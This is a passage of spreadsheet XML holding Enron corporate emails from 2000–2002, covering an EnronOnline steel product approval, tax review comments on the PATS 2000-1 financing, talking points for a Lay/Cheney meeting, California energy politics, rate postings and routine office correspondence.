Communications@Enron Communications, Christina Grow/Corp/Enron@ENRON, Lauren _x000D_
Urquhart/LON/ECT@ECT, Sherri Sera/Corp/Enron@ENRON, Liz M Taylor/HOU/ECT@ECT, _x000D_
Judy G Smith/HOU/EES@EES, Inez Dauterive/HOU/ECT@ECT, Veronica _x000D_
Valdez/HOU/ECT@ECT, Teresa Wright/HR/Corp/Enron@ENRON, Peggy _x000D_
McCurley/HOU/ECT@ECT, Marsha Schiller/HOU/ECT@ECT, Fiona Stewart/LON/ECT@ECT, _x000D_
Jana L Paxton/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mrudula _x000D_
Gadade/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Connie _x000D_
Blackwood/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Tammie Schoppe/HOU/ECT@ECT, _x000D_
Kimberly Hillis/HOU/ECT@ect, Jennifer Burns/HOU/ECT@ECT, Sharon _x000D_
Dick/HOU/EES@EES, Beverly Aden/HOU/EES@EES, Kathy Dodgen/HOU/EES@EES, Binky _x000D_
Davidson/HOU/EES@EES, Kerry Ferrari/LON/ECT@ECT, Carol Moffett/HOU/EES@EES, _x000D_
Jennifer T Adams/HOU/EES@EES, Leah Rijo/Enron Communications@Enron _x000D_
Communications, Lucy Marshall/Enron Communications@Enron Communications, _x000D_
Kathy Campos/GPGFIN/Enron@ENRON, Julie Armstrong/Corp/Enron@ENRON, Taria _x000D_
Reed/Corp/Enron@ENRON_x000D_
		 Subject: ENE Committee and Board Meeting Schedule - 2001_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 09:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: Please Approve New Product Type:  US Steel Cold Rolled Phy_x000D_
 (2064)</t>
  </si>
  <si>
    <t xml:space="preserve">OK for me._x000D_
_x000D_
_x000D_
_x000D_
	Stephanie Sever/ENRON@enronXgate_x000D_
	04/24/2001 04:23 PM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT, Kelly Lombardi/NA/Enron@Enron, Karen _x000D_
Lambert/HOU/ECT@ECT_x000D_
		 cc: Lisa Lees/ENRON@enronXgate, Tom Moran/ENRON@enronXgate_x000D_
		 Subject: FW: Please Approve New Product Type:  US Steel Cold Rolled Phy _x000D_
(2064)  _x000D_
_x000D_
Tana/Kelly/Karen:_x000D_
_x000D_
The product long description below will fall under the new product type US _x000D_
Steel Cold Rolled Plate Phy.  _x000D_
_x000D_
 _x000D_
Credit (Tom Moran) has approved copying the profiles for the new product type _x000D_
from the following:_x000D_
_x000D_
 US Steel Hot Rolled Phy_x000D_
_x000D_
Please respond no later than 10 a.m. on Wednesday, April 25._x000D_
_x000D_
Thank you._x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Cass, Robert B.  _x000D_
Sent: Monday, April 23, 2001 3:24 PM_x000D_
To: Taylor, Mark; Blumenthal, Jeff; Musch, Susan; Gockerman, Matthew F.; _x000D_
Hayden, Frank; Herod, Brenda F.; Moran, Tom; Hagelmann, Bjorn; Roenz, Manfred_x000D_
Cc: Lees, Lisa; Sever, Stephanie; Jones, Tana; Lambert, Karen; Sweitzer, _x000D_
Tara; Kenne, Dawn C.; Moorer, Torrey; Meredith, Kevin; Lozano, Melba; Walker, _x000D_
Chris; Alatorre, Carlos; Carter, Carl_x000D_
Subject: Please Approve New Product Type:  US Steel Cold Rolled Phy (2064)  _x000D_
_x000D_
Please approve the following product type in Datamanager after 11:00 a.m.  _x000D_
See the steps for approval below._x000D_
_x000D_
US Steel Cold Rolled Plate Phy_x000D_
_x000D_
Website Short Description of Product Type:  US CR Steel Phy    ("US Steel _x000D_
Cold Rolled Physical" - #2064)_x000D_
_x000D_
_x000D_
Product Type:_x000D_
A U.S Cold Rolled Steel Transaction with Enron North America Corp, under _x000D_
which the Seller shall deliver and the Buyer shall take and pay for the _x000D_
Contract Quantity of the Commodity at the Purchase Price. The Purchase Price _x000D_
shall be the price submitted by Counterparty via EnronOnline.  The Commodity _x000D_
shall meet specifications and tolerances as further defined below, unless _x000D_
quality tolerances are outlined in Schedule 4 on the Website _x000D_
(http://www/enrononline.com/docs/marketing/Markets/Steel/US/Products/)._x000D_
_x000D_
Reference Period:_x000D_
The term of the Transaction shall be from the Effective Date (or start date) _x000D_
to the Termination Date (or end date). The Effective Date (or start date) is _x000D_
01 Oct 2001. The Termination Date (or end date) is 31 Oct 2001._x000D_
_x000D_
Product Additional Information (example):_x000D_
The Transaction is for cold rolled steel with a thickness of 12 Guage and a _x000D_
width of 48 inches. The Commodity shall be commercial quality, prime, _x000D_
continuous cast, hot rolled steel in coil with specifications to ASTM A366 _x000D_
and tolerances to ASTM A568, unless quality tolerances are outlined in _x000D_
Schedule 3 on the Website. The transaction is F.O.B. Reserve Marine Terminal _x000D_
in Chicago, Ill Metro Area.  F.O.B. refers to the following terms: Seller is _x000D_
responsible for freight, unloading and storage up to and including delivery _x000D_
in warehouse; Buyer is responsible for storage, loading and freight after _x000D_
delivery.  The Contract Quantity shall be quantity submitted by Counterparty _x000D_
via EnronOnline (5% greater or lesser allowance at Seller's option). Each _x000D_
calendar month during the term of the Transaction will be a Dispatch Period.  _x000D_
Enron will guarantee delivery by the 20th of each scheduled Dispatch Period _x000D_
and accept supply to the 15th of each scheduled Dispatch Period.  Payment _x000D_
shall be made, against the receipt of the required documents outlined in the _x000D_
General Terms and Conditions, in the Contractual Currency by telegraphic _x000D_
transfer no later than 30 calendar days after the date on which the Commodity _x000D_
is released to Buyer. _x000D_
_x000D_
Currency:_x000D_
The price is quoted in US Dollars per unit of volume, which will be the _x000D_
Contractual Currency._x000D_
_x000D_
Unit of Measure:_x000D_
The unit of measure against which the price is quoted shall be net tons (2000 _x000D_
lbs) and the quantity shown shall be in net tons per month._x000D_
_x000D_
_x000D_
_x000D_
STEPS FOR APPROVAL:_x000D_
_x000D_
click the  START button _x000D_
select  PROGRAMS_x000D_
select  TEST APPLICATIONS_x000D_
select ENRONONLINE CLUSTER(PROD)_x000D_
 PROCEED WITH USUAL LOGIN/PASSWORD _x000D_
click the Enron Online Production Cluster "START" button  _x000D_
select EnronOnLine (this is the EOL Datamanager)_x000D_
 PROCEED WITH EOL LOGIN/PASSWORD_x000D_
click on the "+" for EnronOnLine_x000D_
click on the "+" for Product Types_x000D_
click on the "+" for "Awaiting Approval" (OR  "Partially Approved")_x000D_
select the product requiring review as stated in e-mail above_x000D_
Right "mouse" click on "properties" to view product set-up _x000D_
TO APPROVE:  Right mouse click on "Approved"_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Jun 2000 09:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'annmarie.tiller@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'kimberly.r.scardino@arthurandersen.com', 'william.stuart@enron.com', 'who@velaw.com', 'johnna.kokenge@enron.com', 'jeff.nogid@enron.com', 'sara.shackleton@enron.com', 'ryan.siurek@enron.com', 'clint.freeland@enron.com', 'rastin@velaw.com', 'pushkar.shahi@enron.com', 'gareth.bahlmann@enron.com', 'paige.grumulaitis@enron.com'})</t>
  </si>
  <si>
    <t>Enron PATS 2000-1</t>
  </si>
  <si>
    <t xml:space="preserve">Here are our tax comments on the PATS documents other than the Offering _x000D_
Circular.   _x000D_
_x000D_
Regards,_x000D_
AnnMarie_x000D_
____________________________________________________x000D_
_x000D_
Remarketing Agreement_x000D_
1.) Section 5, Fees and Expenses, provides that the Remarketing Agent will _x000D_
not be entitled to any compensation or reimbursement for expenses in _x000D_
connection with its services under the Agreement, but UBS Warburg and/or _x000D_
affiliates of the bank are presumably receiving various fees (e.g., _x000D_
structuring, underwriting or placement fees, etc.?) and, to the extent the _x000D_
affiliate is foreign and its employees are performing those services in the _x000D_
US, we could have a withholding tax issue with respect to those fees.   Can _x000D_
we get an itemization of the fees that Enron expects to pay in the deal and _x000D_
the status (i.e., foreign or domestic) of the intended recipient(s)?_x000D_
2.) Section 4(c).  If there is the potential for the remarketed notes to be _x000D_
issued in bearer form, are we sure that Enron will have the necessary rights _x000D_
to design the notes and monitor the marketing process so as to ensure we _x000D_
don't lose our interest deduction and that we don't become subject to _x000D_
withholding for payments to foreign holders?  _x000D_
_x000D_
Trust Agreement_x000D_
1.) Section 1.1, Definition of "Opinion of Counsel," page 6.   The second _x000D_
sentence in this definition which describing that published rulings from the _x000D_
IRS can be relied upon in an an opinion from counsel on tax matters seems _x000D_
awkward.   Are items not listed here off-limits for reliance?  I would _x000D_
propose to delete the sentence entirely. _x000D_
2.) Section 2.1(a), page 10.  _x000D_
 a.) Will the Trust actually be created at the time the Certificateholders _x000D_
make their investment or will it be created earlier and then be amended and _x000D_
restated at the time the Certificateholders make their appearance?   If the _x000D_
latter is true, who will initially hold all the beneficial interests in the _x000D_
Trust, e.g., Enron or a third party, and if the latter, whether it is foreign _x000D_
or domestic?_x000D_
 b.) Are there any restrictions on the number of Certificateholders either _x000D_
initially or at any subsequent time?   If not, can we be sure that the Trust _x000D_
will not treated as a publicly traded partnership for tax purposes?_x000D_
3.) Sections 4.3 and 4.4, pages 17-18.   We should confirm that the The Bank _x000D_
of New York as Trustee will actually be responsible for any tax reporting _x000D_
that needs to ge done in connection with the trust, e.g., trust information _x000D_
return (Form 1041), or in connection with the certificate holders' ownership _x000D_
interest in the trust (Forms 1099-INT (interest) and Form 1099-? (foreign _x000D_
currency swap payments)) and/or Forms 1042/1042-S (if the offering becomes a _x000D_
Regulation S offering).  I have found in the past that even when documents _x000D_
specify that a bank or trust company is supposed to handle these duties, they _x000D_
are typically either ill equipped or physically incapable of complying.   _x000D_
(See also Section 6.11) _x000D_
4.) To the extent that Enron is required to handle any of the book _x000D_
accounting, tax accounting/reporting, and any other day-to-day activitites _x000D_
for the Trust, we need to determine whether that would give the certificate _x000D_
holders nexus in Texas for purposes of the Texas franchise tax.   We should _x000D_
also check to make sure that the reference to Enron in the name of the Trust _x000D_
doesn't affect this analysis especially since Enron is apparently responsible _x000D_
for paying the expenses and liabilities of the Trust under Section 3.6, the _x000D_
Trustee's fees under Section 9.5(a), and is responsible for indemnification _x000D_
of the Trustee, the Paying Agent, and the Certificate Registrar under Section _x000D_
9.5(b). _x000D_
_x000D_
Purchase Agreement_x000D_
1.) Section 3, page 8.  What kind of discounted purchase price will be paid _x000D_
for the Notes first by the Trust and then by the Initial Purchaser?   _x000D_
Presumably, the amount will be de minimis, but we need to know for purposes _x000D_
of doing an original issue discount ("OID") calculation._x000D_
2.) Section 4, page 8.   We need to know if and when it is determined that _x000D_
the Certificates will be offered in a Regulation S offering._x000D_
_x000D_
---------------------- Forwarded by AnnMarie Tiller/Corp/Enron on 06/01/2000 _x000D_
09:37 AM ---------------------------_x000D_
   _x000D_
	Enron Global Finance_x000D_
	_x000D_
	From:  Joyce Dorsey @ ECT                           05/31/2000 02:24 PM_x000D_
	_x000D_
_x000D_
To: rastin@velaw.com, Gareth Bahlmann/HOU/ECT@ECT, Clint _x000D_
Freeland/Corp/Enron@Enron, Paige B Grumulaitis/HOU/ECT@ECT, who@velaw.com, _x000D_
Johnna Kokenge/Corp/Enron@ENRON, jlynch@velaw.com, Jeff Nogid/HOU/ECT@ECT, _x000D_
kimberly.r.scardino@arthurandersen.com, Sara Shackleton/HOU/ECT@ECT, Pushkar _x000D_
Shahi/HOU/ECT@ECT, Ryan Siurek/Corp/Enron@ENRON, William Stuart/HOU/ECT@ECT, _x000D_
AnnMarie Tiller/Corp/Enron@ENRON, Brent Vasconcellos/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Enron PATS 2000-1_x000D_
_x000D_
Please review the attached documents and submit comments on _x000D_
   (i) the Purchase Agreement, _x000D_
   (ii) the Trust Agreement,_x000D_
   (iii) the Remarketing Agreement  and, if time allows, _x000D_
   (iv) the Offering Circular _x000D_
to Gareth Bahlmann or Clint Freeland by 4 p.m. tomorrow, Thursday, June 1.  _x000D_
_x000D_
Clint will be meeting with the legal group tomorrow at 4 pm in EB2762.  _x000D_
Please feel free to attend that meeting if you have comments that need to be _x000D_
discussed._x000D_
_x000D_
Joyce Dorsey_x000D_
Assistant to Gareth Bahlmann  _x000D_
---------------------- Forwarded by Joyce Dorsey/HOU/ECT on 05/31/2000 01:32 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
mukunah@winstim.com on 05/31/2000 08:35:52 AM_x000D_
To: clint.freeland@enron.com, gareth.bahlmann@enron.com, _x000D_
kimberly.blue@ubsw.com, scott.whitney@ubsw.com, ryan.donovan@ubsw.com, _x000D_
scott.giese@ubsw.com, timothy.steele@ubsw.com, michael.davidson@ubsw.com, _x000D_
william.sullivan@ubsw.com, john.magovern@ubsw.com, raustin@houston.rr.com, _x000D_
mspradling@velaw.com, sara.shackleton@enron.com, who@velaw.com, _x000D_
gorloff@bracepatt.com, ktrautner@bracepatt.com, Rastin@velaw.com, _x000D_
jim.hunt@ubsw.com, lyndon.taylor@ubsw.com, tom.field@ubsw.com, _x000D_
ttabor@bankofny.com, kurzw@winstim.com, bergeronc@winstim.com_x000D_
cc: ecklandt@winstim.com, delaneyj@winstim.com, chudyj@winstim.com, _x000D_
earlyhud@winstim.com _x000D_
Subject: Enron PATS 2000-1_x000D_
_x000D_
_x000D_
In connection with Enron's PATS offering, we're attaching a Cover Letter and_x000D_
clean and marked drafts of the revised Preliminary Offering Circular, Purchase_x000D_
Agreement, Remarketing Agreement and Trust Agreement._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Hazel Mukuna_x000D_
_x000D_
(See attached file: Cover Letter.doc)_x000D_
_x000D_
(See attached file: Preliminary Offering Circular.doc)  (See attached file:_x000D_
Preliminary Offering Circular.REDLINE.doc)_x000D_
_x000D_
(See attached file: Purchase Agreement.doc)        (See attached file: _x000D_
Purchase_x000D_
Agreement.REDLINE.doc)_x000D_
_x000D_
(See attached file: Remarketing Agreement.doc)     (See attached file:_x000D_
Remarketing Agreement.REDLINE.doc)_x000D_
_x000D_
(See attached file: Trust Agreement.doc)           (See attached file: Trust_x000D_
Agreement.REDLINE.doc)_x000D_
_x000D_
_x000D_
_______________________________________x000D_
This message, together with any attachments, is intended only for the_x000D_
use of the individual or entity to which it is addressed and may contain_x000D_
information that is legally privileged, confidential and exempt from_x000D_
disclosure.  If you are not the intended recipient, you are hereby_x000D_
notified that any dissemination, distribution, or copying of this_x000D_
message,or any attachment, is strictly prohibited.  If you have received_x000D_
this message in error, please notify the original sender (or the WSPR_x000D_
Help Desk) immediately by telephone (212-858-1000) or by return_x000D_
E-mail and delete the message, along with any attachments, from_x000D_
your computer.  Thank you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Cover Letter.doc_x000D_
 - Preliminary Offering Circular.doc_x000D_
 - Preliminary Offering Circular.REDLINE.doc_x000D_
 - Purchase Agreement.doc_x000D_
 - Purchase Agreement.REDLINE.doc_x000D_
 - Remarketing Agreement.doc_x000D_
 - Remarketing Agreement.REDLINE.doc_x000D_
 - Trust Agreement.doc_x000D_
 - Trust Agreement.REDLINE.doc_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 06:36:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'zakiyyah.mcclure@enron.com', 'tangie.dykes@enron.com', 'alice.johnson@enron.com', 'teb.lokey@enron.com', 'kirk.mcdaniel@enron.com', 'd.j..herron@enron.com', 'natasha.davis@enron.com', 'tamika.hebert@enron.com', 'leonard.daily@enron.com', 'rita.wynne@enron.com', 'sharon.butcher@enron.com'})</t>
  </si>
  <si>
    <t>RE: Active Listing 10/24/01</t>
  </si>
  <si>
    <t>Please disregard the previous email._x000D_
_x000D_
Have a great day!!_x000D_
_x000D_
Zakiyyah_x000D_
xt 58146_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	McClure, Zakiyyah  _x000D_
Sent:	Thursday, October 25, 2001 8:30 AM_x000D_
To:	Butcher, Sharon; Daily, Leonard; Davis, Natasha; Dykes, Tangie; Hebert, Tamika; Herron, D.J.; Johnson, Alice; Lokey, Teb; McDaniel, Kirk; Wynne, Rita_x000D_
Subject:	Active Listing 10/24/01_x000D_
_x000D_
For our morning meeting._x000D_
_x000D_
 &lt;&lt; File: Active_Inactive Booklist_1024.xls &gt;&gt; _x000D_
_x000D_
Zakiyyah McClure_x000D_
Risk Analytics_x000D_
xt 58146</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 02:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Lay / Cheney Talking Points on Steel</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Chris Long/Corp/Enron on 04/24/2001 10:39 AM -----_x000D_
_x000D_
	Lisa Yoho_x000D_
	04/16/2001 10:14 AM_x000D_
		 _x000D_
		 To: Linda Robertson/NA/Enron@ENRON, Lora Sullivan/Corp/Enron@ENRON_x000D_
		 cc: Chris Long/Corp/Enron@ENRON_x000D_
		 Subject: Lay / Cheney Talking Points on Steel_x000D_
_x000D_
Linda- _x000D_
_x000D_
Attached are the steel talking points for the Lay / Cheney meeting.   I have _x000D_
made a revision to the one that's in the briefing book.   Lora - please _x000D_
insert this page.   Thanks._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 26 Jun 2001 07:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sgovenar@govadv.com', 'rshapiro@enron.com', 'ban.sharma@enron.com', 'david.leboe@enron.com', 'miyung.buster@enron.com', 'hgovenar@govadv.com', 'james.d.steffes@enron.com', 'paul.kaufman@enron.com', 'steven.j.kean@enron.com', 'smara@enron.com', 'jennifer.thome@enron.com', 'leslie.lawner@enron.com', 'mary.schoen@enron.com', 'eletke@enron.com', 'harry.kingerski@enron.com', 'acomnes@enron.com', 'kdenne@enron.com', 'jdasovic@enron.com', 'bhansen@lhom.com', 'janel.guerrero@enron.com', 'mark.palmer@enron.com', 'mday@gmssr.com', 'rfrank@enron.com', 'michael.mcdonald@enron.com'})</t>
  </si>
  <si>
    <t>William Simon</t>
  </si>
  <si>
    <t>For those of you who might be interested, William Simon, a  Republican _x000D_
candidate for governor in California, spoke to the Sacramento Press  Club at _x000D_
a lunch I attended today.? Simon is the son of the late William E.  Simon, _x000D_
the former Treasury Secretary._x000D_
?_x000D_
During his presentation, he made a few comments abou the  energy situation _x000D_
in?CA:_x000D_
?_x000D_
A former U.S. attorney and Rudy Guiliani protege, it bothers  him that Gov. _x000D_
Davis has made a point of prejudging generators and marketers  before _x000D_
investigations are complete (Simon supports full investigations into  _x000D_
generator/marketer practices).? He also called Bill Lockyer's "Spike" quote  _x000D_
inappropriate, and said it violates the canon of ethics to threaten  _x000D_
prosecution._x000D_
?_x000D_
He believes it is a mistake to buy the transmission lines and  that the focus _x000D_
should be on increasing supply.? The rhetoric coming from  the governor and _x000D_
AG "do nothing but chill investment," and said he doesn't blame  Mirant for _x000D_
its hesitation to build new plants._x000D_
?_x000D_
If the current energy situation were in his lap, he would  approach?it by _x000D_
getting everybody to the table?to try to find an  overall solution.? It's _x000D_
being done piecemeal now, he said, and that's not  effective._x000D_
?_x000D_
He sees three elements to?addressing the  problem:_x000D_
1.? Limit state involvement -- he does not support a  public power authority;_x000D_
2.? Get supply online;_x000D_
3.??"Restructure,"?which he related to taking a  sagging company and figuring _x000D_
out a concerted approach?to fixing its  problems rather than?putting out fire _x000D_
after fire.? _x000D_
?_x000D_
He believes the generators should relieve some of the  debt._x000D_
?_x000D_
He was asked if?an Edison bankruptcy?would be a bad  thing.??He said _x000D_
it?"can't be good," but prefers to?think  of?Edison's status as a _x000D_
consideration to the overall approach but not  necessarily as the ultimate _x000D_
goal.? He indicated that bankruptcy is not  favorable but should not _x000D_
necessarily be avoided at any  cost.</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 09:55:21 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'michelle.lokay@enron.com', 'kimberly.watson@enron.com', 'lindy.donoho@enron.com', 'mark.mcconnell@enron.com', "paul.y'barbo@enron.com"})</t>
  </si>
  <si>
    <t>FW: 11/2001 TW Rate Matrix for posting</t>
  </si>
  <si>
    <t xml:space="preserve">FYI - I am forwarding the attached file (matrix200111), which provides a matrix of TW's max tariff rates as well as a table of the base res. and comm. rates and reservation surcharges for the Global Settlement contracts.  If you have any questions, please feel free to contact me or Rita._x000D_
_x000D_
Thanks,_x000D_
Elizabeth_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Bianchi, Rita  _x000D_
Sent:	Monday, October 29, 2001 9:26 AM_x000D_
To:	Kuehl, Toby; Abramowicz, Richard_x000D_
Cc:	Brown, Elizabeth; Doll, Jeanette_x000D_
Subject:	11/2001 TW Rate Matrix for posting_x000D_
_x000D_
Please post the attached TW rate matrix, MATRIX200111.doc, effective 11/1/2001._x000D_
_x000D_
Only the rates for the "Current Shippers" as defined in TW's Global Settlement changed,_x000D_
including Reservation, Commodity and TCR surcharges._x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Sun, 14 Oct 2001 15:15:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Receivables deal</t>
  </si>
  <si>
    <t xml:space="preserve">Can you call Joel and find out what this is about?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ephross, Joel  _x000D_
Sent:	Friday, October 12, 2001 10:56 AM_x000D_
To:	Proffitt, Tim; Herron, Chris_x000D_
Cc:	Eickenroht, Robert; Sanders, Richard B._x000D_
Subject:	Receivables deal_x000D_
_x000D_
_x000D_
Attached is a draft of the letter to be sent to ASCC concerning the receivables deal. Tim/Chris, please note that it contemplates a new Monthly Settlement Report. After you have had a chance to review, lets discuss the timing, the dollar figure, and the discussion with the bank._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 9 Aug 2001 13:29:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tenaska IV July</t>
  </si>
  <si>
    <t>Darren:_x000D_
Please remove the price on the Tenaska IV sale, deal 384258, for July and enter the demand fee.  The amount should be $3,902,687.50._x000D_
_x000D_
Thanks,_x000D_
Megan</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 05:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Celgar Pulp Company</t>
  </si>
  <si>
    <t xml:space="preserve">please print this and attached and put in the Project Canary Due Diligence _x000D_
file.  Thanks.  Michelle_x000D_
_x000D_
---------------------- Forwarded by Michelle Cash/HOU/ECT on 12/06/2000 01:58 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Lynn Scrivener" &lt;lscrivener@davis.ca&gt; on 12/06/2000 01:44:43 PM_x000D_
To: &lt;michelle.cash@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Celgar Pulp Company_x000D_
_x000D_
_x000D_
_x000D_
Attached are copies of Dean Crawford's correspondence to the  Employment _x000D_
Standards Branch and to Celgar.? These documents are in  Microsoft Word _x000D_
format._x000D_
?_x000D_
Lynn Scrivener_x000D_
Davis &amp; Company_x000D_
(604) 687-9444 x.  364_x000D_
lscrivener@davis.ca_x000D_
 - LTemp stds - Celgar request.doc_x000D_
 - LT Cargill enc. authorization.doc_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 Jan 2001 06:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Be nice to me or I'll change the p&amp;l again and you'll never be able to close _x000D_
the year.</t>
  </si>
  <si>
    <t>Tue, 23 May 2000 11:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Recommedations</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 05/23/2000 _x000D_
06:38 PM ---------------------------_x000D_
_x000D_
_x000D_
"patricia dalecka" &lt;pdalecka@hotmail.com&gt; on 05/23/2000 12:04:52 AM_x000D_
To: Vince.J.Kaminski@enron.com, vkaminski@aol.com_x000D_
cc:  _x000D_
Subject: Recommedations_x000D_
_x000D_
_x000D_
Hello Vince,_x000D_
_x000D_
How are you?_x000D_
_x000D_
Not much around except that I am seriously studying for Gmat. I am going to_x000D_
take this test between June 12 to 15 and during the week following it I hope_x000D_
to be ready to take TOEFL._x000D_
So far I am most concerned about writing and reading parts that require of_x000D_
knowledge and using good vocabulary and for me is a time consuming because I_x000D_
feel lost for words very often._x000D_
Ok, I be positive ..._x000D_
_x000D_
I am writing to ask you for your support - recommendations._x000D_
I thought it might be more respected when I show recommendations "from here"_x000D_
than from some people from different country._x000D_
_x000D_
Would you like to do it?_x000D_
_x000D_
I am not quite sure what type of rec would you be able to provide me with._x000D_
I think it could be somehow based on our Aiesec relationship?_x000D_
Do you have any other ideas?_x000D_
_x000D_
I would like to bring this letter to the university next week along with my_x000D_
request of application transfer from MBA dep to MS._x000D_
As for today I have enough recommendations - in numbers - but may be some_x000D_
more recent one would add more value into it._x000D_
Do you need more details on: to whom it may concern or any others?_x000D_
_x000D_
Please let me know if you can help?_x000D_
_x000D_
Best regards_x000D_
_x000D_
_x000D_
Patrycja_x000D_
_x000D_
_x000D_
_________________________________________________________________________x000D_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 18:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/17/01; HourAhead hour: 2;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/17/01; HourAhead hour: 2;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Energy Import/Export schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001041702.txt_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 2 / Preferred:  12.00 / Final:  11.98)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/17/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_ERNIE_x000D_
  ENGY_TYPE: WHEEL_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Jun 2000 23:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'meridetk@kochind.com', 'tpape@satake-usa.com'})</t>
  </si>
  <si>
    <t>Friday night</t>
  </si>
  <si>
    <t>Are you guys up for a little guys night out tonight?? Call me 713-853-6203  _x000D_
or leave a message for me at home 713-668-3712._x000D_
_x000D_
_x000D_
MC</t>
  </si>
  <si>
    <t>Tue, 29 Jan 2002 11:48:09 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rika.imai@enron.com', 'k..allen@enron.com', 'cooper.richey@enron.com', 'mike.grigsby@enron.com', 'garrett.tripp@enron.com', 'martin.thomas@enron.com', 's..shively@enron.com', 'john.lavorato@enron.com', 'tim.belden@enron.com', 'john.zufferli@enron.com', 'scott.neal@enron.com', 'mark.symms@enron.com', 'lloyd.will@enron.com', 'j..sturm@enron.com', 'chris.gaskill@enron.com'})</t>
  </si>
  <si>
    <t>Market Data Contracts</t>
  </si>
  <si>
    <t xml:space="preserve">Everyone,_x000D_
_x000D_
We are in the process of creating new contracts with UBS for all Market Data real-time applications, subscriptions and publications.  Attached is a comprehensive list of all contracts that will be renegotiated under the UBS name for use by the Gas and Power trading entities.  _x000D_
_x000D_
In order to leverage UBS' significant discounts and avoid duplicate efforts, Danielle Marcinkowski with Market Data will be the initial point of contact when inquiring about the addition or status of applications or publications.  I bring this to your attention because we understand that several groups have initiated discussions with the various vendors over the past few days.  _x000D_
_x000D_
If you have any questions please feel free to contact me at 713-853-9358 or Danielle at 713-853-7926.  If you think something is missing from the list, please bring it to our attention immediately.  Please pass this word around within your group as appropriate._x000D_
_x000D_
Regards,_x000D_
_x000D_
Chris Behney_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 08:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Chinese Wall Classroom Training</t>
  </si>
  <si>
    <t>Email sent by Ina 03/05/01</t>
  </si>
  <si>
    <t>Wed, 23 Jan 2002 13:46:01 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'aairmail@info.aa.com'})</t>
  </si>
  <si>
    <t>American Airlines AAirmail</t>
  </si>
  <si>
    <t>Susan Scott, thank you for being a valued AADVANTAGE Member! _x000D_
Welcome to the latest edition of AAIRMAIL, the American Airlines email newsletter that's targeted to your interests. We've included product information, service announcements and AADVANTAGE mileage offers that match your travel preferences and delivered them directly to you. _x000D_
To receive the most targeted information from AAIRMAIL, remember to update your profile on AA.com. And while you're there, sign up for our other email programs, AADVANTAGE ESUMMARY and NET SAAVER WEEKEND GETAWAY FARES._x000D_
It's all news from American Airlines - personalized just for you!_x000D_
For additional information about American Airlines, visit http://www.aa.com ._x000D_
IN THIS ISSUE_x000D_
NewscAAst_x000D_
=========_x000D_
* Important Travel Information For Our Customers_x000D_
* AA.com Flight Status Notification_x000D_
* Get Your Boarding Pass At The Curb With ONESTOP Curbside_x000D_
* Enjoy The Convenience Of The ADMIRALS CLUB EXECUTIVE CENTER_x000D_
* It's Your Chance To Vote For AADVANTAGE_x000D_
Earn More Miles With AADVANTAGE_x000D_
===============================_x000D_
* Buy AADVANTAGE Miles For Yourself Or Others_x000D_
Airline Service News_x000D_
====================_x000D_
